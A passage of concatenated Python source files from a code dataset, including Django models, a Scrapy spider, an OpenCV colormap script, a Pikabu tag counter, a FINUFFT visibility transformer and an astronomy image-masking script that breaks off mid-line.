Conference Record'\n verbose_name_plural = 'Research Paper & Conference Records'\n\n def __unicode__(self):\n return \"%s\" % (self.title)\n\n\nclass FDPRecord(models.Model):\n top = models.CharField(verbose_name=\"Type\", max_length=15, blank=False, choices=TYPEFDP, default=TYPEFDP[0][0])\n title = models.CharField(verbose_name=\"Title/Topic\", max_length=300, blank=False)\n faculty = models.ForeignKey(Faculty, default=1)\n venue = models.CharField(verbose_name=\"Venue\", max_length=500, blank=False, null=True)\n address = models.CharField(verbose_name=\"Address\", max_length=500, blank=False, null=True)\n sponsor = models.CharField(verbose_name=\"Sponsoring Authority\", max_length=15, blank=True, null=True, choices=SPONSOR, default=SPONSOR[0][0])\n amount = models.CharField(verbose_name=\"Amount in INR (If Paid)\", max_length=10, blank=False, validators=[RegexValidator('^[0-9-]*$')], null=True)\n specify = models.CharField(verbose_name=\"If other, specify\", max_length=200, null=True, blank=True)\n date = models.DateField(verbose_name=\"Date (from)\", null=True, blank=False)\n date2 = models.DateField(verbose_name=\"Date (to)\", null=True, blank=False)\n\n duration = models.CharField(default=\"\", max_length=10)\n created_at = models.DateTimeField(auto_now_add=True, auto_now=False)\n updated_at = models.DateTimeField(auto_now_add=False, auto_now=True)\n\n def clean(self):\n super(FDPRecord, self).clean()\n req = current_request()\n\n if self.date and self.date2:\n self.duration = str(abs((self.date2 - self.date).days)) + ' days'\n\n if (self.date2 - date.today()).days>0:\n raise ValidationError(\"Date (to) cannot be greater than today's date\")\n\n if (self.date - self.date2).days>0:\n raise ValidationError(\"Date (from) cannot be greater than 
Date (to)\")\n\n try:\n logged_user = req.user.userdepartment\n if ((str(self.faculty.department) == logged_user.department) and (str(self.faculty.shift) == logged_user.shift)) or logged_user.department == 'All':\n return self\n else:\n raise ValidationError(\n \"You don't have rights to change other Department's Data\")\n\n except:\n raise ValidationError(\n \"You don't have rights to change other Department's Data\")\n\n class Meta:\n verbose_name = 'FDP/Workshop Record'\n verbose_name_plural = 'FDP/Workshop Records'\n\n def __unicode__(self):\n return \"%s\" % (self.title)\n","sub_path":"storage/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"607741814","text":"class Budget:\n\n def __init__(self,category, amount):\n self.category = category\n self.amount = amount\n \n #methods\n def deposit(self):\n deposit = float(input('Enter deposit amount: '))\n self.amount += deposit\n return f'Depost Successfull'\n \n\n def withdrawal(self):\n withdraw = float(input('Enter amount to withdraw:'))\n if self.amount >= withdraw:\n self.amount -= withdraw\n return f'Withdraw is successfull'\n else:\n print('Insufficient balance')\n return f'Choose a different amount'\n\n\n def transfer(self):\n transfer = float(input('Enter amount to transfer '))\n if self.amount >= transfer:\n self.amount -= transfer\n return f'Your transfer is successfull'\n else:\n print('Insufficient balance ')\n return f'Choose a different amount'\n\n \n def check_balance(self):\n return f'\\n Your curent balance is {self.amount}'\n \n\n# creating objects of class\ncategory = Budget('Food', 2000)\ncategory_1 = Budget('clothing', 5000)\ncategory_2 = Budget('Entertainment', 7000) \n\n# Calling methods with class objects\nprint('****** Food Category ******')\nprint(category.deposit())\nprint(category.withdrawal())\nprint(category.transfer())\nprint(category.check_balance())\n\n\nprint('****** Clothing Category ******')\nprint(category_1.deposit())\nprint(category_1.withdrawal())\nprint(category_1.transfer())\nprint(category_1.check_balance())\n\n\nprint('****** Entertainment Category ******')\nprint(category_2.deposit())\nprint(category_2.withdrawal())\nprint(category_2.transfer())\nprint(category_2.check_balance())","sub_path":"budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"303076537","text":"\nclass Utilities:\n\n @staticmethod\n def get_unique_items(container: tuple) -> tuple:\n if type(container) != tuple:\n raise TypeError(\"get_unique_items(container: tuple)\"\n \" - container must be of tuple type\")\n if len(container) == 1:\n return tuple(container)\n ans = []\n for item in container:\n if item not in ans:\n ans.append(item)\n return tuple(ans)\n\n @staticmethod\n def request(ostream, istream, message: str) -> str:\n numChars = ostream.write(message)\n ostream.flush()\n input = istream.readline().rstrip()\n istream.flush()\n return input","sub_path":"stricher/week_10/mailroom/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"175337860","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\nfrom douban.items import DoubanItem\n\n\nclass DoubanTop250Spider(scrapy.Spider):\n name = 'douban_top250'\n allowed_domains = ['douban.com']\n 
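# The date checks in FDPRecord.clean() above, restated as a plain function so
# the ordering rules are easy to test in isolation (names are invented):
from datetime import date, timedelta

def check_range(date_from, date_to):
    if (date_to - date.today()).days > 0:
        raise ValueError("Date (to) cannot be greater than today's date")
    if (date_from - date_to).days > 0:
        raise ValueError("Date (from) cannot be greater than Date (to)")
    return '%d days' % abs((date_to - date_from).days)

assert check_range(date.today() - timedelta(days=3), date.today()) == '3 days'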
start_urls = ['https://movie.douban.com/top250']\n\n def parse(self, response):\n #可以先将源码拿到,查看需要的数据是否拿到\n\n # with open(\"test.html\",\"w\",encoding='utf8') as f:\n # f.write(response.text)\n\n\n #拿去该页的数据和下一页的url\n # 将该页数据组装到meta中传递给详情页,在详情页拼接所有数据保存\n\n data_list = response.xpath('//*[@id=\"content\"]/div/div/ol/li/div')\n\n for item in data_list:\n dic = {}\n detail_url = item.xpath('./div/a/@href').extract_first()\n image_url = item.xpath('./div/a/img/@src').extract_first()\n name = item.xpath('./div[2]/div[1]/a/span[1]/text()').extract_first()\n score = item.xpath('./div[2]/div[2]/div/span[2]/text()').extract_first()\n ranking = item.xpath('./div[1]/em/text()').extract_first()\n\n dic['name'] = name\n dic['image_url'] = image_url\n dic['score'] = score\n dic['url'] = detail_url\n dic['ranking'] = ranking\n yield scrapy.Request(detail_url,callback=self.detail_parse,meta=dic)\n\n\n url = response.xpath('//*[@id=\"content\"]/div/div[1]/div[2]/span[3]/a/@href').extract_first()\n next_url = response.urljoin(url)\n yield scrapy.Request(next_url,callback=self.parse)\n\n\n def detail_parse(self,response):\n # with open('detail.html',\"w\",encoding='utf8')as f:\n # f.write(response.text)\n detail = response.xpath('//*[@id=\"link-report\"]/span/text()').extract_first().strip()\n\n data_dic = response.meta\n\n item = DoubanItem()\n item['name'] = data_dic.get('name')\n item['url'] = data_dic.get('url')\n item['image_url'] = data_dic.get('image_url')\n item['score'] = data_dic.get('score')\n item['desc'] = detail\n item['ranking'] = data_dic.get('ranking')\n\n\n #可以在这里调用pipeline进行保存\n yield item","sub_path":"douban/spiders/douban_top250.py","file_name":"douban_top250.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"584467731","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 30 21:34:54 2020\n\n@author: lizeth\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n\ndef hconcat_resize_min(im_list, interpolation=cv2.INTER_CUBIC):\n h_min = min(im.shape[0] for im in im_list)\n im_list_resize = [cv2.resize(im, (int(im.shape[1] * h_min / im.shape[0]), h_min), interpolation=interpolation)\n for im in im_list]\n return cv2.hconcat(im_list_resize)\n\nimg = cv2.imread('t3.jpg',0)\nfil,col = img.shape\nRGB = np.zeros((fil,col,3),dtype = 'uint8')\n\ndvi = 100\nmapc = np.zeros((500, 100, 3), dtype = \"uint8\")\nR1 = np.zeros((500, 100, 1), dtype = \"uint8\")\nG1 = np.zeros((500, 100, 1), dtype = \"uint8\")\nB1 = np.zeros((500, 100, 1), dtype = \"uint8\")\nfor i in range(100):\n for j in range(100):\n R1[i,j] = 0\n G1[i,j] = ((0)*(i/dvi))\n B1[i,j] = ((0)*(i/dvi)) + 128\n\n R1[i+dvi,j] = 0\n G1[i+dvi,j] = ((255)*(i/dvi))\n B1[i+dvi,j] = ((-128)*(i/dvi)) + 128\n\n R1[i+(dvi*2),j] = 255*(i/dvi)\n G1[i+(dvi*2),j] = ((0)*(i/dvi)) +255\n B1[i+(dvi*2),j] = ((0)*(i/dvi))\n\n R1[i+(dvi*3),j] = ((0)*(i/dvi)) + 255\n G1[i+(dvi*3),j] = ((128-255)*(i/dvi)) +255\n B1[i+(dvi*3),j] = ((0)*(i/dvi))\n\n R1[i+(dvi*4),j] = ((0)*(i/dvi)) +255\n G1[i+(dvi*4),j] = ((-128)*(i/dvi)) +128\n B1[i+(dvi*4),j] = 0\n\nmap = cv2.merge((B1,G1,R1))\n#cv2.imshow('mapa',mapc)\n\n\n\ndef inte(intensity):\n if intensity<0:\n R = 0\n G = 0\n B = 128\n elif (intensity > 0) and (intensity<=0.25):\n fraction = intensity\n R = (0) * fraction\n G = (255) * fraction\n B = (-128) * fraction + 128\n\n elif(intensity>0.25) and (intensity<= 0.5):\n fraction = intensity\n R = (255) * fraction\n G = (255-255) * fraction +255\n B = (0) * 
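# response.urljoin in parse() above resolves the relative pagination href
# against the current page URL; plain urllib shows the same resolution:
from urllib.parse import urljoin
print(urljoin('https://movie.douban.com/top250', '?start=25&filter='))
# -> https://movie.douban.com/top250?start=25&filter=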
fraction\n elif(intensity>0.5) and (intensity<= 0.75):\n fraction = intensity/(0.75-0.5)\n R = (255-255) * fraction + 255\n G = (128-255) * fraction + 255\n B = (0) * fraction\n\n elif (intensity>0.75) and (intensity<=1) :\n fraction = intensity\n R = (255-255) * fraction + 255\n G = (-128) * fraction + 128\n B = (- 0) * fraction\n\n else:\n R = 255\n G = 0\n B = 0\n return R,G,B\n\nintensity = 0.0\nfor i in range(fil):\n for j in range(col):\n intensity = img[i][j]/255.0\n r,g,b = inte(intensity)\n RGB[i][j][2] = r\n RGB[i][j][1] = g\n RGB[i][j][0] = b\n\n\nimage = cv2.merge((RGB[:,:,0],RGB[:,:,1],RGB[:,:,2]))\nr = image[:,:,2]\ncv2.imshow('r',r)\ncv2.imwrite('pol.jpg',r)\n\nimg_gray = cv2.merge((img,img,img))\nimgFinal = np.concatenate((img_gray, image), axis=1)\n#cv2.imshow('INTERPOLATION',imgFinal)\n#cv2.imshow('Map',map)\n\nim_h_resize = hconcat_resize_min([img_gray,map, image])\ncv2.imshow('Interpolation',im_h_resize)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"Lab3/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"551971492","text":"\"\"\"This module contains realization of pikabu pasres.\n\nPikabu parser gets specified number of posts and counts all tags.\n\nInfo: to get cookie you need to go and log in at https://pikabu.ru,\nthen open a Request Headers (Request URL: https://pikabu.ru/) and copy cookie to file user_cookie as\ncookie = ...(ur cookie)\n\n Typical usage example:\n\n number_of_posts = 100\n session = requests.Session()\n posts_tags = pikabu_parser(session, number_of_posts)\n\"\"\"\n\nfrom bs4 import BeautifulSoup as bs\nfrom collections import Counter\nimport requests\nimport user_cookie\n\n\nHEADERS = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3',\n 'Connection': 'keep-alive',\n 'Cookie': user_cookie.cookie,\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 OPR/65.0.3467.78 (Edition Yx)',\n 'Upgrade-Insecure-Requests': '1'}\n\n\ndef pikabu_parser(session: requests.Session, num_posts: int) -> Counter:\n \"\"\"Parser tags in pikabu subscriptions on specified number of posts\n\n Args:\n session: Current session\n num_posts: Number of posts where we count tags\n\n Returns:\n Counter structure where key is name of tags and value it's number of appearances\n on specified number of posts\n \"\"\"\n count = Counter()\n current_post = 0\n url = 'https://pikabu.ru/new/subs'\n max_pages_number = num_posts // 10 if not num_posts % 10 else num_posts // 10 + 1\n for page in range(max_pages_number + 1):\n paramload = {'page': str(page)}\n resp = session.get(url, headers=HEADERS, params=paramload)\n soup = bs(resp.content, 'html.parser')\n divs = soup.find_all('div', attrs={'class': 'story__tags tags'})\n for div in divs:\n current_post += 1\n for a in div:\n try:\n count[a['data-tag']] += 1\n except (TypeError, KeyError):\n pass\n if current_post == num_posts:\n return count\n\n\nif __name__ == '__main__':\n number_of_posts = 100\n session = requests.Session()\n posts_tags = pikabu_parser(session, number_of_posts)\n with open('output/tag_statistics.dat', 'w') as stat_file:\n for key, value in posts_tags.most_common(10):\n stat_file.write(f\"{key}: 
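# A vectorized stand-in for the per-pixel inte() lookup above, assuming the
# same five 0..1 breakpoints; np.interp does the piecewise-linear blend that
# the if/elif chain spells out (the channel stops here are illustrative).
import numpy as np

stops = [0.0, 0.25, 0.5, 0.75, 1.0]
red = [0, 0, 255, 255, 255]
intensity = np.array([0.1, 0.4, 0.9])
print(np.interp(intensity, stops, red))    # red channel per pixel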
{value}\\n\")\n","sub_path":"10-HTTP/pikabu_parser.py","file_name":"pikabu_parser.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"72957264","text":"import numpy as np\nfrom astropy import units\n\nimport finufftpy\n\n# NOTE: This is added because I have two version of OpenMP on my laptop\nos.environ['KMP_DUPLICATE_LIB_OK'] = 'True'\n\n\n# ...\nautolens_version = \"0.40.0\"\n\n# ...\nif os.environ[\"HOME\"] == \"/Users/ccbh87\":\n COSMA_HOME = os.environ[\"COSMA_HOME_local\"]\n COSMA_DATA = os.environ[\"COSMA7_DATA_local\"]\nelif os.environ[\"HOME\"] == \"/cosma/home/durham/dc-amvr1\":\n COSMA_HOME = os.environ[\"COSMA_HOME_host\"]\n COSMA_DATA = os.environ[\"COSMA7_DATA_host\"]\n\n# ...\nworkspace_HOME_path = COSMA_HOME + \"/workspace\"\nworkspace_DATA_path = COSMA_DATA + \"/workspace\"\n\n# ...\nimport autofit as af\naf.conf.instance = af.conf.Config(\n config_path=workspace_DATA_path + \"/config\" + \"_\" + autolens_version,\n output_path=workspace_DATA_path + \"/output\")\nimport autolens as al\n\n\nclass FINUFFT_Transformer:\n def __init__(self, uv_wavelengths, grid, eps=10**-6.0):\n\n self.uv_wavelengths = uv_wavelengths\n\n self.grid = grid\n\n self.shift = np.exp(\n 2.0\n * np.pi\n * 1j\n * (\n self.grid.pixel_scale/2.0 * units.arcsec.to(units.rad) * self.uv_wavelengths[:, 1]\n + self.grid.pixel_scale/2.0 * units.arcsec.to(units.rad) * self.uv_wavelengths[:, 0]\n )\n )\n\n # NOTE: normalize the uv_wavelengths according to the max wavenumber given the pixel scale of the image\n self.uv_wavelengths_normalized = self.uv_wavelengths / (1.0 / (2.0 * self.grid.pixel_scale * units.arcsec.to(units.rad)))\n\n self.eps = eps\n\n\n def visibilities_from_image(self, image_in_2d):\n\n visibilities = np.zeros(\n shape=self.uv_wavelengths.shape[0],\n dtype=np.complex\n )\n ret = finufftpy.nufft2d2(\n self.uv_wavelengths_normalized[:, 1] * np.pi,\n self.uv_wavelengths_normalized[:, 0] * np.pi,\n visibilities,\n 1,\n self.eps,\n image_in_2d[:, ::-1]\n )\n visibilities *= self.shift\n\n return visibilities\n\n # def transformed_mapping_matrices_from_mapping_matrix_slow(self, mapping_matrix):\n #\n # # NOTE: This gives correct results but it's very slow ...\n # real_transfomed_mapping_matrix = np.zeros(\n # (self.uv_wavelengths.shape[0], mapping_matrix.shape[1])\n # )\n # imag_transfomed_mapping_matrix = np.zeros(\n # (self.uv_wavelengths.shape[0], mapping_matrix.shape[1])\n # )\n #\n # for source_pixel_1d_index in range(mapping_matrix.shape[1]):\n # image = mapping_matrix[:, source_pixel_1d_index].reshape(\n # self.grid.shape_2d[0],\n # self.grid.shape_2d[1]\n # )\n #\n # visibilities = self.visibilities_from_image(\n # image_in_2d=image\n # )\n #\n # real_transfomed_mapping_matrix[:, source_pixel_1d_index] = visibilities.real\n # imag_transfomed_mapping_matrix[:, source_pixel_1d_index] = visibilities.imag\n #\n # return [real_transfomed_mapping_matrix, imag_transfomed_mapping_matrix]\n\n\n @staticmethod\n def reshape_mapping_matrix(mapping_matrix, shape_2d):\n\n mapping_matrix_reshaped = np.zeros(\n shape=(\n shape_2d + (mapping_matrix.shape[1],)\n )\n )\n\n for i in range(mapping_matrix.shape[1]):\n image = np.reshape(\n a=mapping_matrix[:, i], newshape=shape_2d\n )\n mapping_matrix_reshaped[:, :, i] = image[:, ::-1]\n\n return mapping_matrix_reshaped\n\n\n def transformed_mapping_matrices_from_mapping_matrix(self, mapping_matrix):\n\n mapping_matrix_reshaped = self.reshape_mapping_matrix(\n 
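# The Counter bookkeeping pikabu_parser above relies on, in miniature:
from collections import Counter

count = Counter()
for tag in ['cats', 'humor', 'cats', 'news']:
    count[tag] += 1
print(count.most_common(2))                # [('cats', 2), ('humor', 1)]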
mapping_matrix=mapping_matrix,\n shape_2d=self.grid.shape_2d\n )\n\n visibilities = np.zeros(\n shape=(self.uv_wavelengths.shape[0], mapping_matrix.shape[1]),\n order='F',\n dtype=np.complex\n )\n finufftpy.nufft2d2many(\n self.uv_wavelengths_normalized[:, 1] * np.pi,\n self.uv_wavelengths_normalized[:, 0] * np.pi,\n visibilities,\n 1,\n self.eps,\n mapping_matrix_reshaped\n )\n\n for i in range(visibilities.shape[1]):\n visibilities[:, i] *= self.shift\n\n return [visibilities.real, visibilities.imag]\n","sub_path":"autoarray/operators/FINUFFT_transformer.py","file_name":"FINUFFT_transformer.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"250353070","text":"import logging\nlog = logging.getLogger(__name__)\nimport decimal\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine\nfrom pyramid.renderers import JSON\nfrom pyramid.config import Configurator\n\n\nclass Base(object):\n def __json__(self, request):\n json_exclude = getattr(self, '__json_exclude__', set())\n result_dict = {}\n for key, value in self.__dict__.items():\n if not key.startswith('_') and key not in json_exclude:\n if isinstance(value, decimal.Decimal):\n result_dict[key] = float(value)\n else:\n result_dict[key] = value\n return result_dict\n\n # return {key: value for key, value in self.__dict__.items()\n # # Do not serialize 'private' attributes\n # # (SQLAlchemy-internal attributes are among those, too)\n # if not key.startswith('_')\n # and key not in json_exclude}\n\n\nBase2 = automap_base(cls=Base)\n\n# from pyramid.httpexceptions import (\n# HTTPFound,\n# HTTPNotFound,\n# )\n\nfrom pyramid.view import view_config\n\n# from .models import (\n# DBSession,\n# )\n#\n\n# @view_config(route_name='view_wiki')\n# def view_wiki(request):\n# return HTTPFound(location=request.route_url('view_page',\n# pagename='FrontPage'))\n\n\n@view_config(route_name='view_page', renderer='json')\ndef view_page(request):\n # engine, suppose it has two tables 'user' and 'address' set up\n engine = create_engine(\"postgresql+psycopg2://manu:'manu'@/postgres\")\n\n # reflect the tables\n Base2.prepare(engine, reflect=True)\n\n # mapped classes are now created with names by default\n # matching that of the table name.\n CSVHandle = Base2.classes.CSVHandle\n # config = Configurator()\n # json_renderer = JSON()\n # def CSVHandle_adapter(obj, request):\n # return obj.isoformat()\n # json_renderer.add_adapter(CSVHandle, CSVHandle_adapter)\n # config.add_renderer('json', json_renderer)\n\n session = Session(engine)\n # cols = []\n # col_list = CSVHandle.__table__.columns\n # for co in col_list:\n # cols.append(co.key)\n\n rows = session.query(CSVHandle).order_by(CSVHandle.id).all()\n # if rows is None:\n # return HTTPNotFound('No such page')\n # print \"type o f cs fdb \"\n # print rows\n\n results = []\n # getting columns names from the DB\n\n\n # for row in rows:\n # results.append(jsonpickle.encode(row))\n # results = \"%s %s %s %s %s \" % (results, row.field0,row.field1,row.field2,row.field3)\n # results = \" %s
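# Why Base.__json__ above special-cases Decimal: SQLAlchemy NUMERIC columns
# come back as decimal.Decimal, which json refuses to serialize directly.
import decimal
import json

row = {'id': 1, 'amount': decimal.Decimal('3.50')}
clean = {k: float(v) if isinstance(v, decimal.Decimal) else v
         for k, v in row.items()}
print(json.dumps(clean))                   # {"id": 1, "amount": 3.5}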
\" % results\n log.debug('Returning rows in json format')\n return rows\n\n\n@view_config(route_name='view_page_template', renderer='templates/view.pt')\ndef view_page_template(request):\n return {}","sub_path":"tutorial/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"203440176","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom djangorestframework.views import ListOrCreateModelView, InstanceModelView\nfrom restapi.resources import *\n\nfrom views import ListOrCreateUserView\n\nhandler500 = 'mainsite.views.error500'\nhandler404 = 'mainsite.views.error404'\n\n\nurlpatterns = patterns('',\n\n url(r'^player/$', ListOrCreateModelView.as_view(resource=PlayerResource), name='player_list'),\n url(r'^player/(?P[0-9]+)/$', InstanceModelView.as_view(resource=PlayerResource)),\n\n url(r'^user/$', ListOrCreateUserView.as_view(), name='user_list'),\n url(r'^user/(?P[0-9]+)/$', InstanceModelView.as_view(resource=UserResource), name='user_detail'),\n\n url(r'^pieceColor/$', ListOrCreateModelView.as_view(resource=PieceColorResource), name='pieceColor_list'),\n url(r'^pieceColor/(?P[0-9]+)/$', InstanceModelView.as_view(resource=PieceColorResource), name='pieceColor_detail'),\n\n url(r'^boardSetup/$', ListOrCreateModelView.as_view(resource=BoardSetupResource), name='boardSetup_list'),\n url(r'^boardSetup/(?P[0-9]+)/$', InstanceModelView.as_view(resource=BoardSetupResource), name='boardSetup_detail'),\n\n url(r'^boardSetupColor/$', ListOrCreateModelView.as_view(resource=BoardSetupColorResource), name='boardSetupColor_list'),\n url(r'^boardSetupColor/(?P[0-9]+)/$', InstanceModelView.as_view(resource=BoardSetupColorResource), name='boardSetupColor_detail'),\n\n url(r'^game/$', ListOrCreateModelView.as_view(resource=GameResource), name='game_list'),\n url(r'^game/(?P[0-9]+)/$', InstanceModelView.as_view(resource=GameResource), name='game_detail'),\n\n url(r'^gamePlayer/$', ListOrCreateModelView.as_view(resource=GamePlayerResource), name='gamePlayer_list'),\n url(r'^gamePlayer/(?P[0-9]+)/$', InstanceModelView.as_view(resource=GamePlayerResource), name='gamePlayer_detail'),\n\n url(r'^gameAction/$', ListOrCreateModelView.as_view(resource=GameActionResource), name='gameAction_list'),\n url(r'^gameAction/(?P[0-9]+)/$', InstanceModelView.as_view(resource=GameActionResource), name='gameAction_detail'),\n)\n\nif getattr(settings, 'DEBUG', False) or getattr(settings, 'DEBUG_STATIC', False):\n # If we are in debug mode, prepend a rule to urlpatterns to serve the static media\n import re\n urlpatterns = patterns('',\n url(r'^%s(?P.*)$' % re.escape(settings.STATIC_URL), 'django.views.static.serve', {\n 'document_root': settings.STATIC_ROOT\n }),\n ) + urlpatterns\n","sub_path":"apps/restapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"118243683","text":"\n\nfrom xai.brain.wordbase.nouns._habitation import _HABITATION\n\n#calss header\nclass _HABITATIONS(_HABITATION, ):\n\tdef __init__(self,): \n\t\t_HABITATION.__init__(self)\n\t\tself.name = \"HABITATIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"habitation\"\n\t\tself.jsondata = 
{}\n","sub_path":"xai/brain/wordbase/nouns/_habitations.py","file_name":"_habitations.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"281704731","text":"import matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport handy.scatter as hsc\n\nimport astropy.units as U\nimport astropy.constants as C\nfrom astropy import cosmology as apcy\n\nfrom dustmaps.sfd import SFDQuery\nfrom extinction_redden import A_wave\nfrom astropy.coordinates import SkyCoord\n\nimport h5py\nimport numpy as np\nimport pandas as pds\nimport astropy.wcs as awc\nimport subprocess as subpro\nimport astropy.io.ascii as asc\nimport astropy.io.fits as fits\n\nfrom mpi4py import MPI\ncommd = MPI.COMM_WORLD\nrank = commd.Get_rank()\ncpus = commd.Get_size()\nimport time\n##\nkpc2cm = U.kpc.to(U.cm)\nMpc2pc = U.Mpc.to(U.pc)\nMpc2cm = U.Mpc.to(U.cm)\nrad2asec = U.rad.to(U.arcsec)\npc2cm = U.pc.to(U.cm)\nLsun = C.L_sun.value*10**7\n# cosmology model\nTest_model = apcy.Planck15.clone(H0 = 67.74, Om0 = 0.311)\nH0 = Test_model.H0.value\nh = H0/100\nOmega_m = Test_model.Om0\nOmega_lambda = 1.-Omega_m\nOmega_k = 1.- (Omega_lambda + Omega_m)\n\npixel = 0.396 # the pixel size in unit arcsec\nz_ref = 0.250 \nDa_ref = Test_model.angular_diameter_distance(z_ref).value\nJy = 10**(-23) # (erg/s)/cm^2\nf0 = 3631*10**(-23) # zero point in unit (erg/s)/cm^-2\n\n# sample catalog\nwith h5py.File('/mnt/ddnfs/data_users/cxkttwl/ICL/data/mpi_h5/sample_catalog.h5', 'r') as f:\n\tcatalogue = np.array(f['a'])\nz = catalogue[0]\nra = catalogue[1]\ndec = catalogue[2]\nd_file = '/mnt/ddnfs/data_users/cxkttwl/ICL/wget_data/'\n#d_file = '/mnt/ddnfs/data_users/cxkttwl/ICL/data/sky_sub_img/' # add sky information\n\nload = '/mnt/ddnfs/data_users/cxkttwl/ICL/data/'\nband = ['r', 'g', 'i', 'u', 'z']\nl_wave = np.array([6166, 4686, 7480, 3551, 8932])\nmag_add = np.array([0, 0, 0, -0.04, 0.02])\nzopt = np.array([22.5, 22.5, 22.5, 22.46, 22.52])\nsb_lim = np.array([24.5, 25, 24, 24.35, 22.9])\nRv = 3.1\nsfd = SFDQuery()\n\ndef mask_A(band_id, z_set, ra_set, dec_set):\n\n\tkk = np.int(band_id)\n\tNz = len(z_set)\n\tparam_A = 'default_mask_A.sex'\n\tout_cat = 'default_mask_A.param'\n\tout_load_A = '/mnt/ddnfs/data_users/cxkttwl/PC/A_mask_%d_cpus.cat' % rank\n\t## size test\n\tr_res = 1. 
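# A quick check of the unit constants set up above: rad2asec is the number of
# arcseconds in one radian, used to turn physical/distance ratios into angles.
import astropy.units as U
print(U.rad.to(U.arcsec))                  # ~206264.8 arcsec per radian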
# 2.8 for larger R setting\n\tfor q in range(Nz):\n\t\tz_g = z_set[q]\n\t\tra_g = ra_set[q]\n\t\tdec_g = dec_set[q]\n\n\t\tprint('Now band is', band[kk])\n\t\tprint('*' * 20)\n\t\tpro_f = d_file + 'frame-%s-ra%.3f-dec%.3f-redshift%.3f.fits.bz2' % (band[kk], ra_g, dec_g, z_g)\n\n\t\tdata_f = fits.open(pro_f)\n\t\timg = data_f[0].data\n\t\thead_inf = data_f[0].header\n\t\twcs = awc.WCS(head_inf)\n\t\tcx_BCG, cy_BCG = wcs.all_world2pix(ra_g*U.deg, dec_g*U.deg, 1)\n\t\tR_ph = rad2asec / (Test_model.angular_diameter_distance(z_g).value)\n\t\tR_p = R_ph / pixel\n\n\t\tx0 = np.linspace(0, img.shape[1] - 1, img.shape[1])\n\t\ty0 = np.linspace(0, img.shape[0] - 1, img.shape[0])\n\t\timg_grid = np.array(np.meshgrid(x0, y0))\n\t\tra_img, dec_img = wcs.all_pix2world(img_grid[0,:], img_grid[1,:], 1)\n\t\tpos = SkyCoord(ra_img, dec_img, frame = 'fk5', unit = 'deg')\n\t\tBEV = sfd(pos)\n\t\tAv = Rv * BEV * 0.86\n\t\tAl = A_wave(l_wave[kk], Rv) * Av\n\t\timg = img * 10 ** (Al / 2.5)\n\n\t\thdu = fits.PrimaryHDU()\n\t\thdu.data = img\n\t\thdu.header = head_inf\n\t\thdu.writeto('/mnt/ddnfs/data_users/cxkttwl/PC/source_data_%d.fits' % rank, overwrite = True)\n\n\t\tfile_source = '/mnt/ddnfs/data_users/cxkttwl/PC/source_data_%d.fits' % rank\n\t\tcmd = 'sex '+ file_source + ' -c %s -CATALOG_NAME %s -PARAMETERS_NAME %s'%(param_A, out_load_A, out_cat)\n\t\ta = subpro.Popen(cmd, shell = True)\n\t\ta.wait()\n\n\t\tsource = asc.read(out_load_A)\n\t\tNumb = np.array(source['NUMBER'][-1])\n\t\tA = np.array(source['A_IMAGE'])\n\t\tB = np.array(source['B_IMAGE'])\n\t\ttheta = np.array(source['THETA_IMAGE'])\n\t\tcx = np.array(source['X_IMAGE']) - 1\n\t\tcy = np.array(source['Y_IMAGE']) - 1\n\t\tp_type = np.array(source['CLASS_STAR'])\n\n\t\tKron = 6 * r_res # iso_radius set as 3 times rms (2.8 from size test)\n\t\ta = Kron * A\n\t\tb = Kron * B\n\n\t\tmask = load + 'bright_star_dr12/source_SQL_Z%.3f_ra%.3f_dec%.3f.txt'%(z_g, ra_g, dec_g)\n\t\tcat = pds.read_csv(mask, skiprows = 1)\n\t\tset_ra = np.array(cat['ra'])\n\t\tset_dec = np.array(cat['dec'])\n\t\tset_mag = np.array(cat['r'])\n\t\tOBJ = np.array(cat['type'])\n\t\txt = cat['Column1']\n\t\ttau = 10 * r_res # the mask size set as 10 * FWHM from dr12\n\n\t\tset_A = np.array( [ cat['psffwhm_r'] , cat['psffwhm_g'], cat['psffwhm_i']]) * tau / pixel\n\t\tset_B = np.array( [ cat['psffwhm_r'] , cat['psffwhm_g'], cat['psffwhm_i']]) * tau / pixel\n\t\tset_chi = 